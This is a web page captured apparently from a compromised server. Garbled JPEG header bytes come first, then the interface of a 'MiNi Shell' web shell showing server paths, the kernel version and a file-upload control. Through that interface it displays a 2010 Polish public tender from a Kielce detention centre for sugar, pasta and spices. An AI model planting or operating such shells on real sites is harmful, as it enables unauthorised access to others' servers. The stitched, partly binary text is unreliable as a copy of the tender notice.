JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101118/328727-N-2010.html

<p class="kh_header"><b>Kielce: SUKCESYWNE DOSTAWY CUKRU, MAKARONU I PRZYPRAW</b><br>
<b>Numer ogłoszenia: 328727 - 2010; data zamieszczenia: 18.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Zagnańska 155, 25-563 Kielce, woj. świętokrzyskie, tel. 041 3314091, faks 041 3314419.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> SUKCESYWNE DOSTAWY CUKRU, MAKARONU I PRZYPRAW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I - cukier
cukier biały kl. II CPV 15831200-4, PN-A-74850:1996/Az1:2005 - 20 000kg
(opakowanie 1kg - 50kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
Część II - makaron
makaron gruby (świderki, kolanka, wstążki)
CPV 15851100-9, PN-A-74131:1999 - 8 000kg
(opakowania 1kg - 10kg - foliowe lub inne dopuszczone do kontaktu z żywnością)
zacierka CPV 15851100-9, PN-A-74131:1999 - 1 500kg
(opakowania 1kg - 10kg - foliowe lub inne dopuszczone do kontaktu z żywnością)
Część III - przyprawy
barszcz biały w płynie CPV 15891000-0, PN-A-75980:1997 - 1 200L
(opakowania 0,5L - 1L - butelki plastikowe lub inne dopuszczone do kontaktu z żywnością)
kawa zbożowa CPV 15861000-1, PN-V-74029:2006 - 1 200kg
(opakowania 1kg - 25kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
herbata granulowana czarna CPV 15863200-7, PN-ISO 3720:1997 - 700kg
(opakowania 1kg - 25kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
przyprawa do zup w płynie CPV 15871000-4, PN-A-86967:1998 - 1 300L
(opakowania 1L - 3L - butelki plastikowe lub inne dopuszczone do kontaktu z żywnością)
rosół (bulion w proszku jarzynowy, drobiowy, wołowy) 
CPV 15891500-5, PN-A-86967:1998 - 1 500kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
przyprawa warzywna w proszku CPV 15871270-7, PN-A-86967:1998 - 1 300kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
sól spożywcza jodowana drobnoziarnista 
CPV 15872400-5, PN-C-84081-2:1998 - 2 000kg
(opakowania 1kg - 50kg - foliowe lub inne dopuszczone do kontaktu z żywnością)
liść laurowy CPV 15872000-1, PN-A-86967:1998 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
majeranek CPV 15872000-1, PN-A-86967:1998 - 70kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
ziele angielskie CPV 15872000-1, PN-A-86967:1998 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
pieprz naturalny mielony CPV 15872100-2, PN-A-86965:1997 - 180kg 
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
czosnek suszony mielony CPV 15893000-4, PN-R-75518:1996 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
papryka czerwona mielona CPV 15872000-1, PN-A-86955:1997 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
kwasek cytrynowy w proszku CPV 15800000-6, PN-A-79734:1981 - 60kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
koper suszony CPV 15893000-4, PN-A-77603:2007 - 70kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
cukier waniliowy CPV 15800000-6, PN-A-86946:1997 - 30kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
ocet 10% CPV 15871000-4, PN-EN 13188:2002 - 100L
(opakowania 0,5L - 1L - plastikowe lub inne dopuszczone do kontaktu z żywnością)
musztarda CPV 15871250-1, PN-A-86964:2002 - 600kg
(opakowania 200g - 2kg - plastikowe lub inne dopuszczone do kontaktu z żywnością)
majonez CPV 15871273-8, PN-A-86950:1995 - 700kg
(opakowania 200g - 2kg - plastikowe lub inne dopuszczone do kontaktu z żywnością) 
Wykonawca gwarantuje niezmienność cen przedmiotu zamówienia przez okres 12 miesięcy (cały okres obowiązywania umowy). 
Zamawiający zastrzega sobie prawo zmian ilościowych w pozycjach asortymentu.		
Towar dostarczony ma być w opakowaniach przeznaczonych do kontaktu z żywnością w sposób nie powodujący deformacji i zapewniający jego estetyczny wygląd. Towar musi spełniać wymogi Polskiej Normy.
Na każdym dostarczonym produkcie musi być etykieta z następującymi danymi:
a) nazwa oraz adres dostawcy lub producenta, 
b) nazwa oraz rodzaj produktu,
c) termin ważności/przydatności do spożycia,
d) warunki przechowywania,
e) skład i waga.
Dostawy należy realizować do magazynu Aresztu Śledczego w Kielcach własnym transportem (na koszt Wykonawcy).
Częstotliwość dostaw:
część I - cukier: dostawy należy realizować jeden raz w miesiącu w godz. od 7:00 do 11:00 od poniedziałku do czwartku, w piątek od godz. 7:00 do godz. 9:00.
część II - makaron: dostawy należy realizować jeden raz w miesiącu w godz. od 7:00 do 11:00 od poniedziałku do czwartku, w piątek od godz. 7:00 do godz. 9:00.
część III - przyprawy: dostawy należy realizować dwa razy w miesiącu w godz. od 7:00 do 11:00 od poniedziałku do czwartku, w piątek od godz. 7:00 do godz. 9:00.
Wykonawca zobowiązany jest powiadomić telefonicznie Zamawiającego o realizacji dostawy w danym dniu (uzgodnienie konkretnej godziny dostawy).
Wraz z dostawą towaru Zamawiający żąda faktury. Zawarte w fakturach: nazwa towaru oraz jednostka miary powinny być zgodne z nazwą towaru oraz jednostką miary określonymi w formularzach ofertowych stanowiących załączniki nr 1, 2 i 3 do niniejszej specyfikacji.
W przypadku stwierdzenia jakichkolwiek wad jakościowych dostarczonych produktów Wykonawca zobowiązuje się do ich wymiany i dostarczenia na własny koszt w terminie do godz. 14:00 następnego dnia roboczego.
W przypadku nie dostarczenia w wyznaczonym dniu zamówionej ilości towaru Wykonawca zwróci Zamawiającemu wszelkie koszty jego zakupu (zaopatrzenie, transport itp.) u innego Wykonawcy ustalonego przez Zamawiającego oraz pokryje różnice w cenie zakupu towaru, jak również zapłaci karę umowną w wysokości 10% ceny (brutto) wartości niedostarczonego w tym dniu towaru.
W przypadku nie dokonania wymiany wadliwego towaru Wykonawca zwróci Zamawiającemu wszelkie koszty zakupu towaru wolnego od wad u innego Wykonawcy oraz pokryje różnicę w cenie zakupu towaru wolnego od wad, jak również zapłaci karę umowną   w wysokości 10% ceny (brutto) wartości wadliwego towaru.
W przypadku trzykrotnego stwierdzenia przez Zamawiającego nie dostarczenia towaru lub dostawy towaru nie odpowiadającego wymogom określonym w niniejszej specyfikacji rozwiązanie umowy następuje bez wypowiedzenia - po pisemnym powiadomieniu Wykonawcy o tym fakcie. Ponadto Wykonawca zapłaci karę umowną w wysokości 10 % ceny (brutto) za towar, który miał dostarczyć do końca trwania umowy.
Wykonawca określa w formularzu ofertowym gramaturę lub pojemność poszczególnych artykułów, jaką będzie dostarczał zamawiającemu przez cały okres obowiązywania umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.12.00-4, 15.85.11.00-9, 15.89.10.00-0, 15.86.10.00-1, 15.86.32.00-7, 15.87.10.00-4, 15.89.15.00-5, 15.87.12.70-7, 15.87.24.00-5, 15.87.20.00-1, 15.87.21.00-2, 15.89.30.00-4, 15.87.12.73-8, 15.87.12.50-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> ZAMAWIAJĄCY NIE WYMAGA WNIESIENIA WADIUM</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Areszt Śledczy Kielce ul. Zagnańska 155 25 - 563 Kielce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.11.2010 godzina 10:00, miejsce: Areszt Śledczy Kielce ul. Zagnańska 155 25 - 563 Kielce sekretariat I piętro budynku administracji.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CUKIER.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - cukier
cukier biały kl. II CPV 15831200-4, PN-A-74850:1996/Az1:2005 - 20 000kg
(opakowanie 1kg - 50kg - papierowe lub inne dopuszczone do kontaktu z żywnością).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.12.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MAKARON.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - makaron
makaron gruby (świderki, kolanka, wstążki)
CPV 15851100-9, PN-A-74131:1999 - 8 000kg
(opakowania 1kg - 10kg - foliowe lub inne dopuszczone do kontaktu z żywnością)
zacierka CPV 15851100-9, PN-A-74131:1999 - 1 500kg
(opakowania 1kg - 10kg - foliowe lub inne dopuszczone do kontaktu z żywnością).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.00.00-1, 15.85.11.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - przyprawy
barszcz biały w płynie CPV 15891000-0, PN-A-75980:1997 - 1 200L
(opakowania 0,5L - 1L - butelki plastikowe lub inne dopuszczone do kontaktu z żywnością)
kawa zbożowa CPV 15861000-1, PN-V-74029:2006 - 1 200kg
(opakowania 1kg - 25kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
herbata granulowana czarna CPV 15863200-7, PN-ISO 3720:1997 - 700kg
(opakowania 1kg - 25kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
przyprawa do zup w płynie CPV 15871000-4, PN-A-86967:1998 - 1 300L
(opakowania 1L - 3L - butelki plastikowe lub inne dopuszczone do kontaktu z żywnością)
rosół (bulion w proszku jarzynowy, drobiowy, wołowy) 
CPV 15891500-5, PN-A-86967:1998 - 1 500kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
przyprawa warzywna w proszku CPV 15871270-7, PN-A-86967:1998 - 1 300kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)

sól spożywcza jodowana drobnoziarnista 
CPV 15872400-5, PN-C-84081-2:1998 - 2 000kg
(opakowania 1kg - 50kg - foliowe lub inne dopuszczone do kontaktu z żywnością)
liść laurowy CPV 15872000-1, PN-A-86967:1998 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
majeranek CPV 15872000-1, PN-A-86967:1998 - 70kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
ziele angielskie CPV 15872000-1, PN-A-86967:1998 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
pieprz naturalny mielony CPV 15872100-2, PN-A-86965:1997 - 180kg 
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
czosnek suszony mielony CPV 15893000-4, PN-R-75518:1996 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
papryka czerwona mielona CPV 15872000-1, PN-A-86955:1997 - 50kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
kwasek cytrynowy w proszku CPV 15800000-6, PN-A-79734:1981 - 60kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
koper suszony CPV 15893000-4, PN-A-77603:2007 - 70kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
cukier waniliowy CPV 15800000-6, PN-A-86946:1997 - 30kg
(opakowania 1kg - 10kg - papierowe lub inne dopuszczone do kontaktu z żywnością)
ocet 10% CPV 15871000-4, PN-EN 13188:2002 - 100L
(opakowania 0,5L - 1L - plastikowe lub inne dopuszczone do kontaktu z żywnością)
musztarda CPV 15871250-1, PN-A-86964:2002 - 600kg
(opakowania 200g - 2kg - plastikowe lub inne dopuszczone do kontaktu z żywnością)
majonez CPV 15871273-8, PN-A-86950:1995 - 700kg
(opakowania 200g - 2kg - plastikowe lub inne dopuszczone do kontaktu z żywnością).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.89.10.00-0, 15.86.10.00-1, 15.86.32.00-7, 15.87.10.00-4, 15.89.15.00-5, 15.87.12.70-7, 15.87.24.00-5, 15.87.20.00-1, 15.87.21.00-2, 15.89.30.00-4, 15.87.12.73-8, 15.87.12.50-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com